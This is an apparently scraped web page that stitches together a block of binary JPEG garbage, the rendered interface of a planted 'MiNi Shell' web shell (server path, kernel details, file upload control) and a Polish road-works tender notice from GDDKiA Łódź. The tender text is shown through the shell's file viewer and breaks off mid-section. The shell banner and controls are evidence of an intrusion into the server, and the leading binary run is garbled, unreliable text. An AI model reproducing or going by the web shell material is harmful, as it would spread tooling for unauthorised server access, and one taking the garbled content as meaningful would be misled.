JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210520/0006021601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00060216 z dnia 2021-05-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa BRD w ciągu drogi krajowej Nr 91 w województwie łódzkim w miejscowości Wielki Bór,<br/>Gomunice, Kletnia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GENERALNA DYREKCJA DRÓG KRAJOWYCH i AUTOSTRAD - ODDZIAŁ w ŁODZI</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ODDZIAŁ W ŁODZI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01751157500154</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Irysowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-857</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi_lodz@gddkia.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gddkia.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami krajowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa BRD w ciągu drogi krajowej Nr 91 w województwie łódzkim w miejscowości Wielki Bór,<br/>Gomunice, Kletnia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1522407b-b876-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00060216</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011019/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.19 Poprawa BRD w ciągu drogi krajowej Nr 91 w województwie łódzkim w miejscowości Wielki Bór, Gomunice, Kletnia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gddkia.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gddkia.eb2b.com.pl//</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert<br/>oraz wszelkich oświadczeń odbywa się przy użyciu Platformy. 2. W przypadku posiadania konta na<br/>Platformie - zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Platformy; po<br/>wprowadzeniu danych użytkownika, tj. adresu e-mail oraz hasła, zgłoszenie jest automatycznie<br/>akceptowane przez Platformę; - w przypadku, gdy Wykonawca nie posiada konta na Platformie –<br/>należy w zakładce „Postępowania”, „Lista postępowań otwartych” wybrać niniejsze postępowanie oraz<br/>korzystając z polecenia „zgłoś się do udziału w postępowaniu” przejść do Formularza rejestracyjnego; -<br/>po wypełnieniu Formularza Rejestracyjnego Wykonawca otrzymuje wiadomość elektroniczną (e-mail)<br/>informującą, że może dokonać pierwszego logowania do Platformy. Rejestracja nowego konta podlega<br/>weryfikacji i akceptacji Operatora, która może potrwać do 24h (8h roboczych). 3. Zalecenia<br/>Zamawiającego dotyczące podpisów - kwalifikowanego podpisu elektronicznego, podpisu osobistego,<br/>podpisu zaufanego znajdują się w SWZ (Tom I IDW). 4. Niezbędne wymagania sprzętowo-aplikacyjne<br/>umożliwiające pracę na Platformie: - stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 20/4 Mb/s;- komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 4GB<br/>RAM, Procesor Intel IV4GHZ, jeden z systemów operacyjnych- MS Windows 7, Mac OS x 10.4, Linux<br/>lub ich nowsze wersje; -zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, w<br/>najnowszej wersji, w przypadku Internet Explorer minimalnie wersja 11.0; - włączona obsługa JavaScript; - zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie „pdf”. 5.<br/>Zamawiający dopuszcza przesyłanie danych w formatach dopuszczonych odpowiednimi przepisami<br/>prawa tj. m.in.: .doc, .docx,.txt, .xls, .xlsx, .ppt,.csv, .pdf,. jpg, .git, .png, .tif, .dwg, .ath, .kst, .zip, przy<br/>czym Zamawiający zaleca wykorzystywanie plików w formacie .pdf. Maksymalny rozmiar<br/>pojedynczego pliku to 100 MB, przy czym nie określa się limitu liczby plików. 6. Dokumentacja<br/>przedmiotowego postępowania dostępna jest na Platformie w zakładce „Załączniki”. Pobranie<br/>dokumentu następuje po kliknięciu na wybrany załącznik i wciśnięciu polecenia „Pobierz”. W celu<br/>pobrania wszystkich załączników jednocześnie należy wybrać polecenie „Pobierz paczkę”, a następnie<br/>„Pobierz wszystkie załączniki organizatora”. 7.Dokumenty, oświadczenia, informacje, o których mowa<br/>w SWZ, należy wczytać jako załączniki na Platformie, według Instrukcji korzystania z Platformy,<br/>dostępnej dla zalogowanych użytkowników w zakładce „Pomoc” – „Instrukcje”. Pytania/wnioski o<br/>wyjaśnienie treści SWZ/odwołania składane są przy użyciu zakładki „Pytania/informacje”, polecenie<br/>„Nowe/wysłane” i następnie „Dodaj pytanie/komentarz”. W trakcie etapu składania ofert, oferta,<br/>oświadczenie, o którym mowa w pkt 10.2. IDW, zobowiązanie, o którym mowa w pkt 11.3. IDW,<br/>dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składające się na ofertę, składane są przez Wykonawcę przy użyciu zakładki „Załączniki” polecenie<br/>„Dodaj załącznik”. Po złożeniu ofert, dokumenty elektroniczne, oświadczenia, uzupełnienia,<br/>wyjaśnienia, elektroniczne kopie dokumentów lub oświadczeń przedstawiane przez Wykonawcę na<br/>wezwanie Zamawiającego, składane są przy użyciu zakładki „Pytania/informacje” polecenie<br/>„Nowe/wysłane” i następnie „Dodaj pytanie/ komentarz” albo jako korespondencja w wątku polecenie „Otrzymane” i następnie „Odpowiedz”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że Administratorem<br/>danych osobowych Wykonawcy jest Generalny Dyrektor Dróg Krajowych i Autostrad, ul. Wronia 53, 00-<br/>874Warszawa, tel. (022) 375 88 88, e-mail:kancelaria@gddkia.gov.pl. 2. W sprawach związanych<br/>z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych,<br/>za pośrednictwem adresu e-mail: iod@gddkia.gov.pl. 3. Dane osobowe będą przetwarzane w<br/>celu przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz w celu archiwizacji.<br/>4.Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych,<br/>wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i<br/>archiwach.5. Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym z<br/>uwzględnieniem przepisów w zakresie zamówień publicznych, a także podmiotom przetwarzającym<br/>dane na podstawie zawartych umów.6. Dane osobowe Wykonawcy będą przechowywane przez okres<br/>obowiązywania umowy a następnie 5 lat, albo 15 lat w przypadku zamówień współfinansowanych ze<br/>środków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu okresu<br/>obowiązywania umowy. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one<br/>uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy). 7. Osobie, której dane<br/>dotyczą przysługuje prawo:-dostępu do danych. W przypadku, gdy wykonanie obowiązku związanego z<br/>prawem dostępu do danych wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać<br/>od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego;-<br/>sprostowania danych, ich usunięcia oraz ograniczenia przetwarzania na warunkach określonych w<br/>przepisach Rozporządzenia Parlamentu i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE. Żądanie sprostowania danych nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w<br/>sprawie zamówienia publicznego w zakresie niezgodnym z przepisami. Żądanie sprostowania danych<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z przepisami. Wystąpienie z<br/>żądaniem ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego; -wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych Osobowych. 8. Podanie danych jest dobrowolne, jednakże ich niepodanie<br/>może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu<br/>oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem<br/>wykonawcy z postępowania lub odrzuceniem jego oferty.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz Ogłoszenie pkt RODO (obowiązek informacyjny)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">O.Ł.D3.2411.6.2021.ig</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zadanie polegające na opracowaniu dokumentacji projektowej, a<br/>następnie na wykonaniu robót polegających na budowie ciągu pieszo – rowerowego szerokości<br/>3,5 m na odcinku od km 48+900 do km 51+410 po lewej stronie oddzielonego od jezdni<br/>ogrodzeniem dla pieszych, nawierzchni zjazdów, przykrycie rowu i kanału technologicznego. Po<br/>prawej stronie drogi na odcinku od km 49+485 do km 49+850 i od km 50+385 do km 51+500<br/>będzie wybudowany chodnik o szerokości 2,5 m oddzielony od jezdni drogi ogrodzeniami dla<br/>pieszych. Przebudowane zostaną 4 istniejące zatoki autobusowe, które są zlokalizowane w km<br/>49+150 (strona lewa, z przeniesieniem w km 48+950) w km ok. 49+250 (strona prawa ) w km<br/>ok. 50+360 (strona prawa) oraz w km ok. 50+500 (strona lewa). Dodatkowo będą wybudowane 4<br/>nowe zatoki autobusowe w km ok. 49+600 (strona lewa ) w km ok. 49+850 (strona prawa ) w km<br/>ok. 51+300 (strona lewa) oraz km ok. 51+450 (strona prawa). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45221000-2 - Roboty budowlane w zakresie budowy mostów i tuneli, szybów i kolei podziemnej</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">32 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający<br/>stosować będzie następujące kryteria oceny ofert: 1. Cena 60% = 60pkt 2. Długość okresu gwarancji<br/>20% = 20 pkt 3. Doświadczenie Personelu Wykonawcy 20% = 20pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Personelu Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>dotyczące: zdolności technicznej lub zawodowej: a) dotyczącej Wykonawcy (zdolność zawodowa Wykonawcy): Wykonawca powinien wykazać, że w okresie ostatnich 5 lat przed<br/>upływem termin uskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wykonał(zakończył) co najmniej:• 2 zadania obejmujące budowę, przebudowę lub<br/>rozbudowę drogi lub ulicy o klasie technicznej min. G, o wartości robót w tym zakresie minimum<br/>2.500.000,00 PLN netto każde; Za drogę lub ulicę Zamawiający uzna drogę lub ulicę w<br/>rozumieniu ustawy z dnia 21marca 1985 r. o drogach publicznych (t.j. Dz.U. z 2020 r. poz. 470<br/>ze zm.). Jako wykonanie należy rozumieć doprowadzenie, co najmniej, do wystawienia<br/>Świadectwa Przejęcia (dla Kontraktów realizowanych zgodnie z Warunkami FIDIC), Protokołu<br/>odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się<br/>Świadectwa Przejęcia). Wartości podane w dokumentach potwierdzających spełnienie warunku<br/>w walutach innych, niż wskazane przez Zamawiającego, należy przeliczyć wg średniego kursu<br/>NBP nadzień wystawienia Świadectwa Przejęcia (dla Kontraktów realizowanych zgodnie z Warunkami FIDIC) lub na dzień podpisania Protokołu odbioru robót lub równoważnego<br/>dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnienie<br/>warunku, którego opis dokonania oceny spełnienia został zamieszczony w ust. a, musi wykazać<br/>w całości przynajmniej jeden z wykonawców. b) dotyczącej osób (zdolność zawodowa osób):<br/>Wykonawca musi wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia,<br/>legitymujące się kwalifikacjami zawodowymi i doświadczeniem odpowiednimi do funkcji, jakie<br/>zostaną im powierzone. Wykonawca, na każdą funkcję wymienioną poniżej, wskaże osoby, które<br/>musi mieć dostępne na etapie realizacji zamówienia, spełniające następujące wymagania:•<br/>Kierownik budowy: liczba osób: 1 Osoba posiadająca uprawnienia budowlane do kierowania<br/>robotami budowlanymi bez ograniczeń w specjalności inżynieryjnej drogowej (lub odpowiadające<br/>wydane na podstawie wcześniej obowiązujących przepisów).Osoba, która pełniła funkcję<br/>kierownika budowy lub kierownika robót drogowych przy min. 2 zadaniach obejmujących<br/>budowę, przebudowę lub rozbudowę drogi lub ulicy o klasie technicznej min. G, o wartości robót<br/>w tym zakresie minimum 2.500.000,00 PLN netto każde. Za drogę lub ulicę Zamawiający uzna<br/>drogę lub ulicę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (t.j. Dz.U. z<br/>2020 r. poz. 470ze zm.). Jako wykonanie należy rozumieć doprowadzenie, co najmniej, do<br/>wystawienia Świadectwa Przejęcia (dla Kontraktów realizowanych zgodnie z Warunkami FIDIC),<br/>Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie<br/>wystawia się Świadectwa Przejęcia). Wartości podane w dokumentach potwierdzających<br/>spełnienie warunku w walutach innych, niż wskazane przez Zamawiającego, należy przeliczyć<br/>wg średniego kursu NBP na dzień wystawienia Świadectwa Przejęcia (dla<br/>Kontraktów realizowanych zgodnie z Warunkami FIDIC) lub na dzień podpisania Protokołu<br/>odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się<br/>Świadectwa Przejęcia).W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia spełnienie warunku, którego opis dokonania oceny spełnienia został zamieszczony<br/>w ust. b, musi wykazać w całości przynajmniej jeden z wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu Wykonawca składa: 1) wykaz robót budowlanych wykonanych nie wcześniej niż<br/>w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz<br/>z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty<br/>te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a<br/>jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>inne odpowiednie dokumenty; 2) wykaz osób, skierowanych przez wykonawcę do realizacji<br/>zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje 